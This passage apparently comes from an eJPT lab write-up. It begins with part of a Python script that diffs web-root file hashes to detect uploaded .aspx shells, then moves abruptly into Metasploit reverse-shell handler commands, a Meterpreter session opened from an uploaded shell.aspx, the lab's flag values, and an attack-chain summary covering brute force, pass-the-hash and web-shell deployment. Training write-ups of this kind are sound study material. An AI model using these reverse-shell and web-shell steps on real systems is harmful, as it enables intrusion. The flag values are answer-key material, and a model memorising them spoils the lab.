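    # standing in for the upload) and an edit to an existing static page.
    (root / "shell.aspx").write_text("placeholder standing in for an uploaded script\n")
    with (root / "iisstart.htm").open("a") as fh:
        fh.write("<!-- appended after baseline -->\n")
    return baseline


def run_demo():
    """Build the constructed web root, then diff its baseline against the current state."""
    with tempfile.TemporaryDirectory() as tmp:
        baseline = build_demo_webroot(tmp)
        return diff_manifests(baseline, hash_tree(tmp))


if __name__ == "__main__":
    result = run_demo()
    for key in ("added", "modified", "removed"):
        print(f"{key}: {result[key]}")
    print("needs a look:", result["suspicious"])
```

The baseline would normally be written once at deployment and the diff scheduled every few minutes; a modified static page is worth a ticket, but a new .aspx in a directory that should only ever receive content through a deployment pipeline is the signal to treat as an incident. The stronger fix, which this check complements rather than replaces, is not to share a directory between the FTP service and the web root at all, and to disable script execution for any directory that must accept uploads.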
Step 3: Reverse Shell Handler Setup
Before triggering our payload, we need to set up a handler to catch the incoming connection:
use multi/handler
set payload windows/shell/reverse_tcp
set LHOST 10.10.49.6
set LPORT 1234
run
Handler Setup Results:
msf6 exploit(multi/handler) > show options
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
msf6 exploit(multi/handler) > set lhost 10.10.49.6
lhost => 10.10.49.6
msf6 exploit(multi/handler) > set lport 1234
lport => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.49.6:1234
Step 4: Payload Execution
Navigate to our uploaded shell in a web browser:
http://target.ine.local/shell.aspx
Reverse Shell Connection Results:
[*] Started reverse TCP handler on 10.10.49.6:1234
[*] Sending stage (201798 bytes) to 10.2.27.100
[*] Meterpreter session 6 opened (10.10.49.6:1234 -> 10.2.27.100:49576) at 2025-09-28 20:02:25 +0530
meterpreter >
Success! Our reverse shell connects, providing us with command execution on the target system.
Step 5: System Access and Flag Retrieval
Now we have a command shell on the target system. Let’s navigate to retrieve our final flag:
meterpreter > shell
Process 1692 created.
Channel 1 created.
c:\windows\system32\inetsrv> cd c:\
c:\> dir
c:\> type flag4.txt
System Access and Flag Retrieval:
meterpreter > shell
Process 1692 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>cd c:\
cd c:\
c:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is AEDF-99BD
Directory of c:\
09/28/2025 01:21 PM 34 flag4.txt
06/13/2024 10:35 AM <DIR> inetpub
08/22/2013 03:52 PM <DIR> PerfLogs
08/12/2020 04:13 AM <DIR> Program Files
11/15/2022 06:51 AM <DIR> Program Files (x86)
06/13/2024 08:41 AM <DIR> Shares
01/09/2025 05:36 AM <DIR> Users
01/09/2025 05:30 AM <DIR> Windows
1 File(s) 34 bytes
7 Dir(s) 239,054,848 bytes free
c:\>type flag4.txt
type flag4.txt
972d3f3b01e8468bb9ea81ce98d34c75
Flag 4 Content:
972d3f3b01e8468bb9ea81ce98d34c75
🚩 Flag 4: 972d3f3b01e8468bb9ea81ce98d34c75
Attack Chain Summary
This exercise demonstrated a realistic attack progression where each compromise enables the next:
- Initial Reconnaissance - Port scanning identified SMB, FTP, and HTTP services
- SMB Password Attack - Brute forced weak password for user ‘tom’
- Information Gathering - Found NTLM hashes in accessible share
- Lateral Movement - Pass-the-hash attack compromised user ‘nancy’
- Credential Discovery - Discovered FTP credentials for user ‘david’
- Service Exploitation - FTP access to web root enabled file upload
- Code Execution - Uploaded web shell for remote command execution
- System Compromise - Achieved full system access for final flag
Key Techniques Used
SMB Exploitation - Used Metasploit’s automated scanner for efficient password brute forcing and pass-the-hash attacks against Windows authentication.
Credential Reuse - Leveraged information from one compromised service to access others, demonstrating how attackers move laterally through systems.
Web Shell Deployment - Combined FTP write access with web server execution to achieve remote code execution through ASP payload upload.
Vulnerabilities Exploited
Weak Passwords - User ‘tom’ had a dictionary-based password vulnerable to brute force attacks.
Credential Storage - Leaked NTLM hashes enabled direct authentication without password cracking.
Service Integration - FTP access to web root created a path from file upload to code execution.
Access Controls - Users had excessive permissions to sensitive network shares.
Security Lessons
Defense Strategies:
- Implement strong password policies and multi-factor authentication
- Use proper credential storage with salted hashes
- Isolate services and apply least privilege principles
- Monitor for failed authentication attempts and unusual file uploads
Key Takeaway: This lab showed how multiple minor weaknesses combine to enable complete compromise. The attack chain from weak passwords to web shell deployment illustrates real-world penetration testing methodology.
Captured Flags:
- Flag 1: 7709e0d8e268405599af1eb0ea8bf304 (SMB brute force)
- Flag 2: 1dd400033942437c983d4ca85c044828 (Pass-the-hash)
- Flag 3: dd04520d2c574e98ac278f232b340783 (FTP access)
- Flag 4: 972d3f3b01e8468bb9ea81ce98d34c75 (Web shell execution)
Conclusion
This CTF exercise demonstrated how multiple seemingly minor security weaknesses can be chained together to achieve complete system compromise. The progression from weak passwords through credential reuse to web shell deployment illustrates real-world attack patterns that penetration testers and defenders need to understand.
Each flag required different exploitation techniques, showcasing the diverse skill set needed for effective penetration testing. The exercise reinforced that security is only as strong as the weakest link - even with some controls in place, the combination of weak passwords, credential leakage, and service misconfigurations created multiple paths to compromise.
For aspiring penetration testers, this lab demonstrates the importance of systematic enumeration, lateral thinking about service relationships, and understanding how different attack techniques can be combined for maximum impact.
This writeup is part of the eJPT certification journey, demonstrating practical penetration testing techniques in a controlled environment.